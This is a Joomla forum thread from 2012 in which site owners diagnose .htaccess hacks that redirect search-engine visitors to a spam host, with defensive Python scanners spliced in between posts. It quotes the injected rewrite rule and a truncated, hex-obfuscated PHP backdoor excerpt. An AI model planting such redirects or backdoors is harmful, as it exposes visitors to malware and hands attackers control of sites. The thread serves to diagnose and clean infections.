The Joomla! Forum ™



 Post subject: Joomla SEF URLs hacked
PostPosted: Thu Mar 22, 2012 10:26 pm 
Joomla! Apprentice

Joined: Fri Apr 02, 2010 4:35 am
Posts: 23
Hi,

Just wondering if anyone has any info on the issue I had with my website.

I believe my .htaccess was hacked somehow; this redirected every Search Engine Friendly URL on my site to http://<spam>.ru/way/cream.php *I don't know how safe that url is, but I have looked at the source and there doesn't appear to be anything malicious in it*

the altered .htaccess looked like this:

Quote:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask||web-archiv)\.(.*)

RewriteRule ^(.*)$ http://<spam>.ru/way/cream.php [R=301,L]
</IfModule>


To fix the redirects I just replaced the .htaccess with a previous backup, disabled all Search Engine Friendly URLs and disabled mod_rewrite.

Can anyone provide info on how or what happened, and if there may be any other altered server-side files or database injections? Seems very odd - are there any prevention measures I can take to stop this from happening again? I plan to upgrade to Joomla 2.5; it is currently 1.5.

Edulex .com appears to have the same thing happening to their website.

data from WHOIS.REGISTRY.TCINET.RU:


domain: <spam>.RU
nserver: ns1.reg.ru.
nserver: ns2.reg.ru.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
registrar: REGRU-REG-RIPN
admin-contact: http://www.reg.ru/whois/admin_contact
created: 2012.03.13
paid-till: 2013.03.13
free-date: 2013.04.13
source: TCI

Last updated on 2012.03.23 02:18:42 MSK

Cheers


Last edited by mandville on Thu Mar 22, 2012 11:50 pm, edited 2 times in total.
trimmed code, removed link spam, broke site link, trimmed irrelevant whois data
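A defender's way to check what a rewrite block like the one quoted above actually does, written as an added example for this thread (it is not code from the original post or from Joomla). It parses RewriteCond/RewriteRule pairs, flags any rule whose target is a host other than the site's own, and records whether the rule is gated on a search-engine referer (so the owner browsing directly never sees it) and whether it catches every URL. The sample .htaccess text, the placeholder host malicious.example and the function names are assumptions made for the example.

```python
import re
from pathlib import Path
from typing import Dict, List

# Referer fragments that search-engine-cloaking redirects usually key on,
# so that site owners who type the URL directly never see the redirect.
SEARCH_REFERERS = ("google", "bing", "yahoo", "ask", "yandex", "web-archiv")

COND_RE = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
CATCH_ALL = {"^(.*)$", "(.*)", ".*", "^.*$", "^(.*)"}


def analyse_htaccess(text: str, own_hosts: List[str]) -> List[Dict]:
    """Return one finding per RewriteRule whose target leaves own_hosts.

    RewriteCond lines only apply to the next RewriteRule, so they are
    collected and attached to the rule that follows them.
    """
    own = {h.lower() for h in own_hosts}
    findings, pending_conds = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = COND_RE.match(line)
        if m:
            pending_conds.append({"test": m.group(1), "pattern": m.group(2)})
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        conds, pending_conds = pending_conds, []
        target, flags = m.group(2), (m.group(3) or "")
        host_m = re.match(r"https?://([^/]+)", target, re.I)
        if not host_m:
            continue  # internal rewrite such as Joomla's own index.php rule
        host = host_m.group(1).lower()
        if host in own:
            continue
        referer_gated = any(
            c["test"].upper() == "%{HTTP_REFERER}"
            and any(s in c["pattern"].lower() for s in SEARCH_REFERERS)
            for c in conds
        )
        findings.append({
            "line": lineno,
            "target_host": host,
            "flags": flags,
            "search_referer_only": referer_gated,
            "catch_all": m.group(1) in CATCH_ALL,
        })
    return findings


def scan_tree(root: str, own_hosts: List[str]) -> Dict[str, List[Dict]]:
    """Analyse every .htaccess below root (the thread saw them at any depth)."""
    results = {}
    for path in Path(root).rglob(".htaccess"):
        findings = analyse_htaccess(path.read_text(errors="replace"), own_hosts)
        if findings:
            results[str(path)] = findings
    return results


# Constructed sample modelled on the rules quoted in the thread; the
# target host is a placeholder, not the spam domain the moderators removed.
SAMPLE_HTACCESS = """\
<IfModule mod_rewrite.c>
RewriteEngine On
# Joomla's normal SEF rule: no scheme in the target, so it is not flagged
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule (.*) index.php
RewriteCond %{HTTP_REFERER} ^.*(google|ask||web-archiv)\\.(.*)
RewriteRule ^(.*)$ http://malicious.example/way/cream.php [R=301,L]
</IfModule>
"""

if __name__ == "__main__":
    for finding in analyse_htaccess(SAMPLE_HTACCESS, ["www.example.org"]):
        print(finding)
```

Run it over the whole account root rather than one site: several people in this thread found the rogue file outside the Joomla directory, and scan_tree() walks every subdirectory, so a copy dropped in images/ or a sibling domain's folder is reported too.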


PostPosted: Thu Mar 22, 2012 10:39 pm
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 23363
Location: @Webdongle
You need to run the Forum Post Assistant then save your configuration.php file then delete all the folders/files. Check your computer for malware ... and everything else on the list on viewtopic.php?f=432&t=475313

_________________
http://weblinksonline.co.uk/joomla-faq.html


PostPosted: Fri Mar 23, 2012 12:44 am
Joomla! Apprentice

Joined: Fri Mar 23, 2012 12:38 am
Posts: 19
I have had what I think is exactly the same problem today...


PostPosted: Fri Mar 23, 2012 12:57 am
Joomla! Fledgling

Joined: Thu Mar 22, 2012 11:21 pm
Posts: 1
We're fighting the same problem here. Two different sites, built by two different people, two seemingly different problems, until we compared the "forward to" site. Only thing in common between the sites is that both operate out of the same 1and1 account.

But here's where it gets interesting. We fixed one by eliminating the .htaccess files - thanks for that tip. The other site does not contain a single .htaccess file. And I also downloaded and searched EVERY FILE on the website for "hand-poise". Nothing found. But it keeps forwarding.

Then we discovered that the directory root, to which no joomla site has access, had a hacked .htaccess file. How is that possible unless someone hacked either the ftp access (which uses long random passwords), or something on the 1and1 end of things... So out of curiosity, are you a 1and1 customer?

We've now deleted that file, and checked again - nowhere is there an .htaccess file, but still the problem persists...

Both sites: Joomla 1.7.3.

Any help or clues from anyone would be much appreciated...

P.S. To the moderators. I understand the need to kill off links, but in this case, you might want to leave at least one. I had no idea what happened to me, no clue that I'd been hacked through .htaccess or my SEF URLs. I was lucky to find this thread, and its answers, by searching for the evil website name. Now that name is gone. I'm guessing a lot of others will be searching for the same thing I did. Just sayin...

<spam link removed>


Last edited by mandville on Fri Mar 23, 2012 3:23 am, edited 1 time in total.
removed spam link previously deleted. do not post links to spam/malicious sites


PostPosted: Fri Mar 23, 2012 1:12 am
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 23363
Location: @Webdongle
controlguy wrote:
We fixed one by eliminating the .htaccess files
No, you cut the wires to the fire alarm.

controlguy wrote:
Then we discovered that the directory root, to which no joomla site has access, had a hacked .htaccess file
The OP (whose thread you are hijacking) said nothing about the .htaccess being in the server root.

controlguy wrote:
We've now deleted that file, and checked again - nowhere is there an .htaccess file, but still the problem persists

Of course the problem persists, because you have done the equivalent of cutting the wires to the fire alarm instead of putting out the fire.

controlguy wrote:
Both sites: Joomla 1.7.3
You should have updated.


In addition to all of that you have not yet run the Forum Post Assistant. Please use that tool and post the results.

PostPosted: Fri Mar 23, 2012 2:25 am
Joomla! Apprentice

Joined: Fri Apr 02, 2010 4:35 am
Posts: 23
Hey controlguy,

I'd suggest removing both sites and databases and uploading a stable backup of each.

Then update joomla to the latest stable build with joomla admin tools, I'd also change all passwords for your joomla site and database.

It appears whatever this is it affects the database and restores the .htaccess to the altered redirect.

Webdongle - sorry, it would be pointless to run this tool now as I have already restored my sites and updated to a stable joomla build, so the error no longer exists.

Whatever hack this is it is very malicious and you need to fix this immediately as it points the site to [URL Removed] with extension [Extension Removed]
which appears to be a virus. I've also seen it point a url to [URL removed], which has a fake windows anti-virus downloader.

cheers


Last edited by imanickam on Fri Mar 23, 2012 2:53 am, edited 1 time in total.
Removed references to the site where the malicious code exists and to the fake anti-virus downloader. In the future, please do not post these links in the public forum.


PostPosted: Fri Mar 23, 2012 2:37 am
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 23363
Location: @Webdongle
Torgock wrote:
Hey controlguy,

I'd suggest removing both sites and databases and uploading a stable backup of each.

Then update joomla to the latest stable build with joomla admin tools, I'd also change all passwords for your joomla site and database.

It appears whatever this is it affects the database and restores the .htaccess to the altered redirect.
...
If your PC is infected then you will get hacked again. Databases are rarely hacked. You need to update your extensions as well.

Admin tools is not Joomla but it is a good way to update Joomla.


Torgock wrote:
...
Webdongle - sorry It would be pointless to run this tool now as I have already restored my sites and updated to a stable joomla build so the error no longer exists.
...
There is every need to run the Forum Post Assistant, it will show a lot of things that you may have missed. Like chmod folders and files 777 because you can't install extensions. And many other things.

PostPosted: Fri Mar 23, 2012 2:43 am
Joomla! Apprentice

Joined: Fri Apr 02, 2010 4:35 am
Posts: 23
ok i'll run it thanks.


PostPosted: Fri Mar 23, 2012 3:21 am
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11706
Location: The Girly Side of Joomla in Sussex
controlguy wrote:
We're fighting the same problem here
i will leave the discussion on hijacking etc to webdongle, who quite rightly has suggested that you start your own topic or follow this one or read http://docs.joomla.org/Security_Checklist_7

controlguy wrote:
P.S. To the moderators. I understand the need to kill off links, but in this case, you might want to leave at least one.
we do that to prevent those who might be inexperienced in the ways of the world clicking links, and to prevent spam link juice for fly-by-night malicious code sites.

Quote:
I had no idea what happened to me, no clue that I'd been hacked through .htaccess or my SEF URLs.
As webdongle said, and should possibly imply harder, each site is unique and therefore we prefer to have each user making their own post. telling us about your site and its life story distracts from helping the OP and then helping others.
Quote:
I was lucky to find this thread, and its answers, by searching for the evil website name.
you could easily have found this topic by searching for things like 301 redirect etc

Quote:
Now that name is gone. I'm guessing a lot of others will be searching for the same thing I did.
perhaps, but tomorrow it will have a different name, and you reposting it after it had been removed shows a near blatant disregard for both policy and netiquette. i will say once, please do not do it again.
if you want to tag it with something, why not use 301 redirect, htaccess hacked.

Quote:
Just sayin...
just telling.
<spam link removed>

Now for educational purposes, if someone has accessed your site to the point they can view/edit your htaccess file, then they can go anywhere and do whatever they want across your account and possibly others.
what has your host said?

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


PostPosted: Fri Mar 23, 2012 9:35 am
Joomla! Apprentice

Joined: Fri Mar 23, 2012 12:38 am
Posts: 19
yep... just checked its the .htaccess file that has all the redirects to the spam site.

changed the .htaccess file and you cannot access the homepage... so whatever it is, it runs deeper into joomla.

started my own thread here http://forum.joomla.org/viewtopic.php?f=432&t=705216 but will certainly continue to monitor this thread as well.


PostPosted: Fri Mar 23, 2012 11:15 am
Joomla! Apprentice

Joined: Fri Mar 23, 2012 10:31 am
Posts: 21
Quote:
Now for educational purposes, if someone has accessed your site to the point they can view/edit your htaccess file, then they can go anywhere and do whatever they want across your account and possibly others.
what has your host said?

I could not get a meaningful response from my host. I have a shared hosting account with 15 affected domains. I have gone through the checklist twice and the new htaccess codes are appearing at the same time across multiple domains. On clean installs.


PostPosted: Fri Mar 23, 2012 11:24 am
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11706
Location: The Girly Side of Joomla in Sussex
johnb18919 wrote:
I have gone through the checklist twice and the new htaccess codes are appearing at the same time across multiple domains.
which points to 3 options:
1. cron job replacing htaccess
2. server-wide hack (host is not just you)
3. your computer is infected, see viewtopic.php?f=432&t=411735

can people follow http://docs.joomla.org/Security_Checklist_7 and post their host name (not the registrar!)

PostPosted: Fri Mar 23, 2012 11:40 am
Joomla! Apprentice

Joined: Fri Mar 23, 2012 10:31 am
Posts: 21
1. I have no cron jobs
2. Checked my PC with 2 programs, appears clean.
3. Any suggestions in regard to item #2?

Godaddy Shared Hosting.


PostPosted: Fri Mar 23, 2012 11:45 am
Joomla! Apprentice

Joined: Fri Mar 23, 2012 12:38 am
Posts: 19
im streamline.net shared hosting...


PostPosted: Fri Mar 23, 2012 2:05 pm
Joomla! Fledgling

Joined: Fri Mar 23, 2012 1:25 pm
Posts: 3
The same problem. Some script generates .htaccess files in the user root directory redirecting to another domain.


PostPosted: Fri Mar 23, 2012 2:33 pm
Joomla! Apprentice

Joined: Fri Apr 02, 2010 4:35 am
Posts: 23
I have disabled all my sites to stop visitors from getting hit by this virus landing page.

I believe a possible issue is that I did not have the latest stable version of Joomla on all of my websites, it may possibly be a component/plugin vulnerability.

I've spoken to my hosting tech support multiple times to no avail.

I currently have tech support analyzing my entire hosting server, will keep you posted if they find anything.

I plan to archive restore my entire web server back to a previous stable date, then download everything onto a local machine. I will then update Joomla to latest versions and remove any suspicious plugins in a local environment, I will be disconnected from the internet for precaution. All passwords including database will be changed.

My PC virus scanner returned a clean bill of health.

One thing that has worked for me is restoring or replacing every .htaccess file on the server with one not infected with:

Code:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask||web-archiv)\.(.*)

RewriteRule ^(.*)$ http://<spam>.ru/way/cream.php [R=301,L]
</IfModule>


Then changing the file permission to 444 as soon as it has been uploaded to the server; this should stop the file from being re-written and effectively stops the redirect to the malicious website. I have also tried setting the .htaccess file permission to 000, which returns a 403 Forbidden on all my websites; this is better than having your visitors land on a virus website.

This is not a fix to the problem as the issue still exists, but it will help prevent your visitors from getting hit with a virus and give you a little breathing room to rectify the problem - ie restore a backup, update joomla, remove or update all components/mods and plugins.


PostPosted: Fri Mar 23, 2012 2:52 pm
Joomla! Fledgling

Joined: Fri Mar 23, 2012 1:25 pm
Posts: 3
We have analyzed the logs and found a jos_core.php file in the tmp folder, the treatment of which coincides in time with the creation of the .htaccess files. I think this is a malicious script.


PostPosted: Fri Mar 23, 2012 3:21 pm
Joomla! Apprentice

Joined: Fri Apr 02, 2010 4:35 am
Posts: 23
Quote:
We have analyzed the logs and found jos_core.php file in the tpm folder, treatment of which coincide in time with the creation of the .htaccess files. I think this is a malicious script.


I can not find a file called jos_core.php or a folder called tpm on my webserver.
Can you provide the url structure to the tpm folder?

ie:- /administrator/cache/tpm


PostPosted: Fri Mar 23, 2012 3:29 pm
Joomla! Fledgling

Joined: Fri Mar 23, 2012 1:25 pm
Posts: 3
No, just /tmp folder in your site root. You can try to find some of the text below:



// ####################### SET PHP ENVIRONMENT ###########################

// #################### DEFINE IMPORTANT CONSTANTS #######################
define('THIS_SCRIPT', 'register');
define('CSRF_PROTECTION', true);
define('CONTENT_PAGE', false);

// ################### PRE-CACHE TEMPLATES AND DATA ######################
// get special phrase groups
$phrasegroups = array('timezone', 'user', 'register', 'cprofilefield');

// get special data templates from the datastore
$specialtemplates = array(
'smiliecache',
'bbcodecache',
'banemail',
'ranks',
);

// pre-cache templates used by all actions
preg_replace("/.*/e","\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28' ..........
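The excerpt above shows the two traits that make a dropped PHP file like jos_core.php stand out: a preg_replace() whose pattern carries the /e modifier (which makes PHP evaluate the replacement as code) and a replacement written entirely as \xNN escapes. The scanner below is an added example for this thread, not code from the original post or from Joomla; it looks for exactly those two traits and decodes the hex run so an administrator can see what it hides without running it. The sample PHP texts, the placeholder file names and the function names are assumptions made for the example; the hex run in the sample is the one quoted in the post, truncated where the post truncates it.

```python
import re
from pathlib import Path
from typing import Dict, List

# preg_replace("<pattern>", ...): the first argument carries the modifiers
PREG_FIRST_ARG_RE = re.compile(r"""preg_replace\s*\(\s*(["'])(.*?)\1""", re.S)
# eight or more consecutive \xNN escapes is a hand-hidden string, not normal PHP
HEX_RUN_RE = re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}")
SUSPECT_CALLS = ("eval", "gzinflate", "gzuncompress", "base64_decode", "str_rot13")


def decode_hex_escapes(run: str) -> str:
    """Turn a \\x65\\x76... run into the text it hides."""
    return bytes.fromhex(run.replace("\\x", "")).decode("latin-1")


def pattern_has_e_modifier(pattern: str) -> bool:
    """True if a PCRE pattern string ends with the /e modifier (removed in PHP 7)."""
    delim = pattern[:1]
    end = pattern.rfind(delim)
    return bool(delim) and end > 0 and "e" in pattern[end + 1:]


def inspect_php(source: str) -> Dict:
    """Report the obfuscation traits of one PHP source text."""
    e_modifier = any(pattern_has_e_modifier(m.group(2))
                     for m in PREG_FIRST_ARG_RE.finditer(source))
    decoded = [decode_hex_escapes(r) for r in HEX_RUN_RE.findall(source)]
    hidden = sorted({c for d in decoded for c in SUSPECT_CALLS if c in d})
    return {
        "preg_replace_e": e_modifier,
        "decoded_hex": decoded,
        "hidden_calls": hidden,
        "suspicious": e_modifier or bool(hidden),
    }


def scan_php_tree(root: str) -> Dict[str, Dict]:
    """Return inspect_php() results for every suspicious *.php below root."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        report = inspect_php(path.read_text(errors="replace"))
        if report["suspicious"]:
            hits[str(path)] = report
    return hits


# Constructed sample: the tail of the jos_core.php excerpt quoted in the
# thread, truncated where the post truncates it, behind a little benign code.
SAMPLE_MALICIOUS_PHP = r'''<?php
define('THIS_SCRIPT', 'register');
$phrasegroups = array('timezone', 'user', 'register', 'cprofilefield');
// pre-cache templates used by all actions
preg_replace("/.*/e","\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28' ..........
'''

# Constructed sample of an ordinary preg_replace() that must not be flagged.
SAMPLE_CLEAN_PHP = r'''<?php
$slug = preg_replace("/[^a-z0-9]+/i", "-", $title);
echo htmlspecialchars($slug);
'''

if __name__ == "__main__":
    report = inspect_php(SAMPLE_MALICIOUS_PHP)
    print("preg_replace /e:", report["preg_replace_e"])
    print("hidden calls:", report["hidden_calls"])
    print("decoded:", report["decoded_hex"])
```

Decoding the escapes only reveals the call chain the file was going to evaluate; the payload itself stays untouched, so the check is safe to run over a live tree. The /e test is deliberately separate from the hex test because either alone is a reason to pull the file for review.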


PostPosted: Fri Mar 23, 2012 3:55 pm
Joomla! Apprentice

Joined: Wed Mar 17, 2010 10:15 pm
Posts: 5
Hi, everybody. First, sorry for my English. I'm not a Joomla expert but I'm trying to fix this problem on my site. I see many .htaccess files in several folders. What do you think about downloading my site, opening it locally, running a search and removing all the .htaccess files inside, and then re-uploading it again? If it reappears, what could generate these files? Thanks for your advice


PostPosted: Fri Mar 23, 2012 5:43 pm
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11706
Location: The Girly Side of Joomla in Sussex
ggreen - i haven't seen a file like that since vBulletin days!
but yes, that is your shell script (backdoor entrance) but not how they got the file there in the first place
see viewtopic.php?f=432&t=705216&p=2772517#p2772517

PostPosted: Fri Mar 23, 2012 6:40 pm
Joomla! Apprentice

Joined: Fri Apr 02, 2010 4:35 am
Posts: 23
I found jos_core.php in a tmp folder, it looks like it was installed the same day as Sourcerer-v2.11.0.zip.

Do you guys have Sourcerer-v2.11.0 installed?


PostPosted: Fri Mar 23, 2012 8:08 pm
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 23363
Location: @Webdongle
Torgock wrote:
I found jos_core.php in a tmp folder, it looks like it was installed the same day as Sourcerer-v2.11.0.zip.
...

You found that nearly 24 hours after you were advised to delete all the folders/files on your server. Obviously you are not taking the advice given. Also the version of Sourcerer is old and listed in the VEL with a link to the latest version. You obviously ignored that advice as well.

Because you are not following advice then I will not waste my time giving it.

@the rest who are hijacking this thread
Create your own threads if you want your problems answered.

PostPosted: Fri Mar 23, 2012 8:23 pm
Joomla! Apprentice

Joined: Fri Apr 02, 2010 4:35 am
Posts: 23
hosting tech support advised me not to delete any files as they are analyzing the hosting server, I tend to listen to the people who are actively analyzing my server. I've taken the websites offline, and also attained the restored backup files.

I'm telling people that Sourcerer-v2.11.0 may have been the issue so that they can pinpoint the problem; the site I had Sourcerer-v2.11.0 on was a testing environment that I have not used for some time, hence why I hadn't updated.

I have already re-created a restored web server with all sites working fine, Webdongle I'm offering this information to help other people with the same problem.


PostPosted: Fri Mar 23, 2012 9:08 pm
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 23363
Location: @Webdongle
Torgock wrote:
hosting tech support advised me not to delete any files as they are analyzing the hosting server,...



Ah, misread
Torgock wrote:
I've spoken to my hosting tech support multiple times to no avail.

I currently have tech support analyzing my entire hosting server
It looked like it was not Hosting tech support but some other tech support analysing the server. Who is your Host ?

PostPosted: Fri Mar 23, 2012 9:13 pm
Joomla! Apprentice

Joined: Wed Mar 17, 2010 10:15 pm
Posts: 5
:) OK I did this to solve the problem (permanently, I hope):

0. Run a full backup
1. I got a healthy .htaccess (previous backup) and replaced the infected one.
2. In my cPanel, I ran a search to locate all the .htaccess files in my folders.
3. Using FileZilla, I deleted all the .htaccess files with the same size and date as the infected one.
4. I also erased jos_core.php (just in case; it is suspicious).
5. Then I tried again with Google Chrome and the redirection disappears.

By now, it works. I'm aware in case you guys discover the hole or the script that causes this


PostPosted: Fri Mar 23, 2012 9:20 pm
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 23363
Location: @Webdongle
@oscarguzval

You are hijacking someone else's thread and with incorrect information. You said you replaced some files. Unless you delete all the folders/files on the server then the infection is still on the server. You have not solved your problem.

PostPosted: Fri Mar 23, 2012 9:29 pm
Joomla! Apprentice

Joined: Wed Mar 17, 2010 10:15 pm
Posts: 5
I'm not an expert like you, but I just shared the course of action that works for me and my site. I would really appreciate it if you shared with me what is wrong with this procedure (still working) and what is the best way to solve it. (Sorry, English is not my native language, so I would appreciate it a lot if you could write your answer in plain words)

Thank you

Greetings from Colombia


PostPosted: Fri Mar 23, 2012 9:40 pm
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 23363
Location: @Webdongle
oscarguzval wrote:
... but I just share the course of action that works for me and my site. ...

But that is the point it will not always get rid of the infection.


oscarguzval wrote:
...I really appreciate if you share with me what is wrong with this procedure (still working) ...
I already have ... you need to delete all folders/files on the server. And had you read the 'Please read before you Post' (sticky) you would know what else needs to be done to ensure your site is not reinfected.

PostPosted: Sat Mar 24, 2012 7:23 pm
Joomla! Hero

Joined: Sat Oct 21, 2006 10:20 pm
Posts: 2702
Location: Wisconsin USA
Regardless of whether your host said not to delete the files, you should follow the points below in order to properly repair your site and help prevent it from happening again. You can always coordinate the effort with your host's request, but if they wanted the files they could have copied them, or can easily copy them, to a different server made for that purpose in less than 5 minutes.

It would help us to help you if before you post your security/been hacked topic

You must state what version of 1.5 you are using.

Tell us if you have done the following, try copy and paste to use as a posting guide if needed

[ ] Did you use the forum http://forum.joomla.org/search.php search box for a similar error?

[ ] Run the Forum Post Assistant / FPA Instructions available here and are also included in the download package.

[ ] Ensure you have the latest version of Joomla. Delete all files in your Joomla installation, saving a copy of the configuration.php file. Replace the deleted files with fresh copies of a current full version of Joomla (minus the installation directory), and fresh copies of extensions and templates used. Upload the copy of your configuration file. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in files and directories More detail can be found in the security Checklist 7 link below.

[ ] Review Vulnerable Extensions List

[ ] Review and action Security Checklist 7 to make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, virus, trojans, spyware, etc.

[ ] Change all passwords and if possible user names for the website host control panel and your Joomla site.

[ ] Use proper permissions on files and directories. They should never be 777, but ideal is 644 and 755

[ ] Check your htaccess for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous ftp enabled

Note: The forum post tool will work with 1.0.x, J1.6.x, J1.7.x, 2.5.x versions of Joomla.

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator
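Two items in the checklist above, and the earlier chmod 444 / 000 workaround in this thread, are about file modes and about spotting .htaccess files that were written in one batch. The audit below is an added example for this thread (not code from the original posts or from Joomla): it walks an account tree, reports every entry writable by group or others (the checklist's "never 777; 644 and 755 are ideal") or carrying an execute bit on web content, and groups .htaccess files by modification time so a set dropped at the same second across several folders stands out. The directory layout in the usage note and the function names are assumptions made for the example.

```python
import stat
from pathlib import Path
from typing import Dict, List

# The checklist's recommended modes: nothing writable by group or others.
RECOMMENDED = {"dir": 0o755, "file": 0o644}
# Content the web server only needs to read; an execute bit on it is a smell.
WEB_CONTENT = {".php", ".html", ".htm", ".css", ".js", ".xml", ".ini"}


def audit_permissions(root: str) -> List[Dict]:
    """List every entry below root whose mode is looser than recommended."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        st = path.lstat()
        if stat.S_ISLNK(st.st_mode):
            continue  # judge the target where it lives, not the link
        kind = "dir" if stat.S_ISDIR(st.st_mode) else "file"
        mode = stat.S_IMODE(st.st_mode)
        problems = []
        if mode & stat.S_IWOTH:
            problems.append("world-writable")
        elif mode & stat.S_IWGRP:
            problems.append("group-writable")
        is_web_content = path.suffix.lower() in WEB_CONTENT or path.name == ".htaccess"
        if kind == "file" and is_web_content and mode & (
                stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
            problems.append("execute bit on web content")
        if problems:
            findings.append({
                "path": str(path),
                "kind": kind,
                "mode": oct(mode),
                "problems": problems,
                "recommended": oct(RECOMMENDED[kind]),
            })
    return findings


def htaccess_by_mtime(root: str) -> Dict[int, List[str]]:
    """Group .htaccess files by whole-second mtime to expose batch-dropped copies."""
    groups: Dict[int, List[str]] = {}
    for path in Path(root).rglob(".htaccess"):
        groups.setdefault(int(path.lstat().st_mtime), []).append(str(path))
    return {mtime: sorted(paths) for mtime, paths in groups.items()}


if __name__ == "__main__":
    # Assumed layout: the account root that holds all of the domains.
    ACCOUNT_ROOT = "/home/example/public_html"
    for finding in audit_permissions(ACCOUNT_ROOT):
        print(finding["mode"], "->", finding["recommended"], finding["path"],
              ", ".join(finding["problems"]))
    for mtime, paths in sorted(htaccess_by_mtime(ACCOUNT_ROOT).items()):
        if len(paths) > 1:
            print(f"{len(paths)} .htaccess files share mtime {mtime}:")
            for p in paths:
                print("   ", p)
```

The audit reports and never changes modes, so it can be run before the host's own analysis is finished; a large group of .htaccess files sharing one mtime is the evidence to hand to the host, since on shared hosting a file written at the same moment in several domains points past any single Joomla install.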

